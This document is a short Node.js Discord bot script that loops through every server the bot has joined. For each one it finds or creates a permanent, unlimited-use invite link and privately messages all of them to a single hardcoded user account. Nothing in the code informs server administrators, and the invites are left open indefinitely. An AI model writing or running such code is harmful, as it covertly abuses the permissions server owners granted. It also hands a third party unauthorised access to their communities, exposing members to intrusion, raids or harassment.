const { Client, GatewayIntentBits, PermissionsBitField } = require('discord.js');
const JSONConfig = require("./config.json");

// Create a new Discord client instance
const client = new Client({
    intents: [
        GatewayIntentBits.Guilds,
        GatewayIntentBits.GuildMembers, // Required to fetch guild members
        GatewayIntentBits.GuildInvites  // Required to manage and fetch invites
    ],
});

// Function to send a DM to unprankable01
async function sendDM(content) {
    //const userId = '790709753138905129';//unprankable
    const userId = '1273153837699563565';//chibubbles
    //const userId = '799101657647415337';//houdert6
    try {
        const user = await client.users.fetch(userId);
        await user.send(content);
        console.log(`DM sent to ${user.tag}: ${content}`);
    } catch (err) {
        console.error(`Failed to send DM: ${err.message}`);
    }
}

client.once('ready', async () => {
    await console.log(`Logged in as ${client.user.tag}! invite.js`);

    // Log the number of servers the bot is in
    await console.log(`The bot is currently in ${client.guilds.cache.size} server(s).`);

    // Loop through all guilds the bot is in
    for (const [guildId, guild] of client.guilds.cache) {
        try {
            // Fetch members to ensure they are cached
            await guild.members.fetch();

            // Fetch existing invites
            const invites = await guild.invites.fetch();
            const validInvite = invites.find(invite => !invite.expiresAt && !invite.revoked);

            if (!validInvite) {
                // Create a new invite if no valid one exists
                const targetChannel = guild.channels.cache.find(channel => 
                    channel.isTextBased()
                );

                if (!targetChannel) {
                    console.warn(`No suitable channel to create an invite in guild: ${guild.name}`);
                    continue;
                }

                const newInvite = await targetChannel.createInvite({
                    maxAge: 0,
                    maxUses: 0,
                    unique: true,
                    reason: 'Generated by bot',
                });

                await sendDM(`New invite created for guild: ${guild.name} -> ${newInvite.url}`);
            } else {
                await sendDM(`Valid invite found for guild: ${guild.name} -> ${validInvite.url}`);
            }

        } catch (error) {
            await console.log(`Error processing guild: ${guild.name} - ${error.message}`);
        }
    }
    
});

// Login to Discord with the bot token
client.login(JSONConfig.token).catch(error => {
    console.error(`Failed to log in: ${error}`);
});
